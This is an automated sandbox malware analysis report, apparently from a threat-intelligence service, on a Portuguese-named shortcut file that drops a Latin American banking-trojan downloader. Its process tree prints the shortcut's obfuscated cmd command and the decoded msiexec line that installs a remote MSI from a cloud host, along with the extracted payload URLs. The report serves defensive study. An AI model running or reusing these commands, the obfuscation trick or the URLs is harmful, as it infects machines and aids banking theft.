Analysis
-
max time kernel
126s -
max time network
126s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
23/11/2021, 15:26
Static task
static1
Behavioral task
behavioral1
Sample
23 de Novembro.lnk
Resource
win7-en-20211104
Behavioral task
behavioral2
Sample
23 de Novembro.lnk
Resource
win10-en-20211014
General
-
Target
23 de Novembro.lnk
-
Size
1KB
-
MD5
dbc89ba629ae4c675b9c77d6e2e7db23
-
SHA1
b27c719b2226145787b90a07494dc66b32817b4e
-
SHA256
0b58d3b97a11a82aafda54aa682cddc11cf513dbcf980a145a04c8b5a362ccdf
-
SHA512
7e5225364a21aae63a9aaef89aeb7994e0c902e81220a4e169463ccb32a17986858d2e53dd9208dea2c07012e4d24f891e67109ec1c2fd7337f2a40328853d86
Malware Config
Extracted
latam_generic_downloader
https://ym4dusty.s3.sa-east-1.amazonaws.com/softo.kn3
Signatures
-
Generic LATAM Downloader
Generic Latin American MSI downloader used to drop various banking trojans.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 7 504 msiexec.exe 11 3220 MsiExec.exe -
Executes dropped EXE 1 IoCs
pid Process 3160 fZFej.exe -
Loads dropped DLL 6 IoCs
pid Process 3220 MsiExec.exe 3220 MsiExec.exe 3160 fZFej.exe 3160 fZFej.exe 1992 iexplore.exe 1992 iexplore.exe -
Use of msiexec (install) with remote resource 1 IoCs
pid Process 504 msiexec.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\Admin-_G404sGW = "\"C:\\Users\\Admin\\Saved Games\\Admin BNpCm\\fZFej.exe\"" iexplore.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe -
Drops file in Windows directory 7 IoCs
description ioc Process File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI5448.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID33F.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIDA15.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE59F.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 iexplore.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString iexplore.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS iexplore.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer iexplore.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName iexplore.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion iexplore.exe -
Modifies Control Panel 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\(Padrão) 2 = "fZFej" fZFej.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\(Padrão) 3 = "C:\\Users\\Admin\\Saved Games\\Admin BNpCm\\" fZFej.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 11 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 316 msiexec.exe 316 msiexec.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe 1992 iexplore.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 504 msiexec.exe Token: SeIncreaseQuotaPrivilege 504 msiexec.exe Token: SeRestorePrivilege 504 msiexec.exe Token: SeTakeOwnershipPrivilege 504 msiexec.exe Token: SeSecurityPrivilege 316 msiexec.exe Token: SeCreateTokenPrivilege 504 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 504 msiexec.exe Token: SeLockMemoryPrivilege 504 msiexec.exe Token: SeIncreaseQuotaPrivilege 504 msiexec.exe Token: SeMachineAccountPrivilege 504 msiexec.exe Token: SeTcbPrivilege 504 msiexec.exe Token: SeSecurityPrivilege 504 msiexec.exe Token: SeTakeOwnershipPrivilege 504 msiexec.exe Token: SeLoadDriverPrivilege 504 msiexec.exe Token: SeSystemProfilePrivilege 504 msiexec.exe Token: SeSystemtimePrivilege 504 msiexec.exe Token: SeProfSingleProcessPrivilege 504 msiexec.exe Token: SeIncBasePriorityPrivilege 504 msiexec.exe Token: SeCreatePagefilePrivilege 504 msiexec.exe Token: SeCreatePermanentPrivilege 504 msiexec.exe Token: SeBackupPrivilege 504 msiexec.exe Token: SeRestorePrivilege 504 msiexec.exe Token: SeShutdownPrivilege 504 msiexec.exe Token: SeDebugPrivilege 504 msiexec.exe Token: SeAuditPrivilege 504 msiexec.exe Token: SeSystemEnvironmentPrivilege 504 msiexec.exe Token: SeChangeNotifyPrivilege 504 msiexec.exe Token: SeRemoteShutdownPrivilege 504 msiexec.exe Token: SeUndockPrivilege 504 msiexec.exe Token: SeSyncAgentPrivilege 504 msiexec.exe Token: SeEnableDelegationPrivilege 504 msiexec.exe Token: SeManageVolumePrivilege 504 msiexec.exe Token: SeImpersonatePrivilege 504 msiexec.exe Token: SeCreateGlobalPrivilege 504 msiexec.exe Token: SeRestorePrivilege 316 msiexec.exe Token: SeTakeOwnershipPrivilege 316 msiexec.exe Token: SeRestorePrivilege 316 msiexec.exe Token: SeTakeOwnershipPrivilege 316 msiexec.exe Token: SeIncreaseQuotaPrivilege 2084 WMIC.exe Token: SeSecurityPrivilege 2084 WMIC.exe Token: SeTakeOwnershipPrivilege 2084 WMIC.exe Token: SeLoadDriverPrivilege 2084 WMIC.exe Token: SeSystemProfilePrivilege 2084 WMIC.exe Token: SeSystemtimePrivilege 2084 WMIC.exe Token: SeProfSingleProcessPrivilege 2084 WMIC.exe Token: SeIncBasePriorityPrivilege 2084 WMIC.exe Token: SeCreatePagefilePrivilege 2084 WMIC.exe Token: SeBackupPrivilege 2084 WMIC.exe Token: SeRestorePrivilege 2084 WMIC.exe Token: SeShutdownPrivilege 2084 WMIC.exe Token: SeDebugPrivilege 2084 WMIC.exe Token: SeSystemEnvironmentPrivilege 2084 WMIC.exe Token: SeRemoteShutdownPrivilege 2084 WMIC.exe Token: SeUndockPrivilege 2084 WMIC.exe Token: SeManageVolumePrivilege 2084 WMIC.exe Token: 33 2084 WMIC.exe Token: 34 2084 WMIC.exe Token: 35 2084 WMIC.exe Token: 36 2084 WMIC.exe Token: SeRestorePrivilege 316 msiexec.exe Token: SeTakeOwnershipPrivilege 316 msiexec.exe Token: SeRestorePrivilege 316 msiexec.exe Token: SeTakeOwnershipPrivilege 316 msiexec.exe Token: SeRestorePrivilege 316 msiexec.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 504 msiexec.exe 3220 MsiExec.exe 504 msiexec.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2816 wrote to memory of 3548 2816 cmd.exe 69 PID 2816 wrote to memory of 3548 2816 cmd.exe 69 PID 3548 wrote to memory of 3836 3548 cmd.exe 70 PID 3548 wrote to memory of 3836 3548 cmd.exe 70 PID 3836 wrote to memory of 504 3836 cmd.exe 71 PID 3836 wrote to memory of 504 3836 cmd.exe 71 PID 3836 wrote to memory of 656 3836 cmd.exe 72 PID 3836 wrote to memory of 656 3836 cmd.exe 72 PID 3836 wrote to memory of 1328 3836 cmd.exe 73 PID 3836 wrote to memory of 1328 3836 cmd.exe 73 PID 316 wrote to memory of 3220 316 msiexec.exe 76 PID 316 wrote to memory of 3220 316 msiexec.exe 76 PID 316 wrote to memory of 3220 316 msiexec.exe 76 PID 3220 wrote to memory of 2084 3220 MsiExec.exe 78 PID 3220 wrote to memory of 2084 3220 MsiExec.exe 78 PID 3220 wrote to memory of 2084 3220 MsiExec.exe 78 PID 3160 wrote to memory of 1992 3160 fZFej.exe 82 PID 3160 wrote to memory of 1992 3160 fZFej.exe 82 PID 3160 wrote to memory of 1992 3160 fZFej.exe 82 PID 3160 wrote to memory of 1992 3160 fZFej.exe 82
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\23 de Novembro.lnk"1⤵
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /V/c "sET JIEX=^|morMiSEe +1 ^|cMiSEmMiSEd&&sET IeCXE=mMiSEsieMiSExec.eMiSExe /i httMiSEps://qMiSE9j.s3.eu-west-MiSE2.amazoMiSEnaws.com/setMiSEupMiSE.mMiSEsi&&sEt MAoK=!IeCXE:MiSE=!&&sEt ESxCa=!JIEX:MiSE=!&&cmd /c !MAoK! !ESxCa!"2⤵
- Suspicious use of WriteProcessMemory
PID:3548 -
C:\Windows\system32\cmd.execmd /c msiexec.exe /i https://q9j.s3.eu-west-2.amazonaws.com/setup.msi |more +1 |cmd3⤵
- Suspicious use of WriteProcessMemory
PID:3836 -
C:\Windows\system32\msiexec.exemsiexec.exe /i https://q9j.s3.eu-west-2.amazonaws.com/setup.msi4⤵
- Blocklisted process makes network request
- Use of msiexec (install) with remote resource
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:504
-
-
C:\Windows\system32\more.commore +14⤵PID:656
-
-
C:\Windows\system32\cmd.execmd4⤵PID:1328
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:316 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 457278B14761D62B3F8D0AB15D9916B62⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3220 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" process call create 'C:\Users\Admin\Saved Games\Admin BNpCm\fZFej.exe'3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2084
-
-
-
C:\Users\Admin\Saved Games\Admin BNpCm\fZFej.exe"C:\Users\Admin\Saved Games\Admin BNpCm\fZFej.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies Control Panel
- Suspicious use of WriteProcessMemory
PID:3160 -
C:\Program Files (x86)\Internet explorer\iexplore.exe"C:\Program Files (x86)\Internet explorer\iexplore.exe"2⤵
- Loads dropped DLL
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1992
-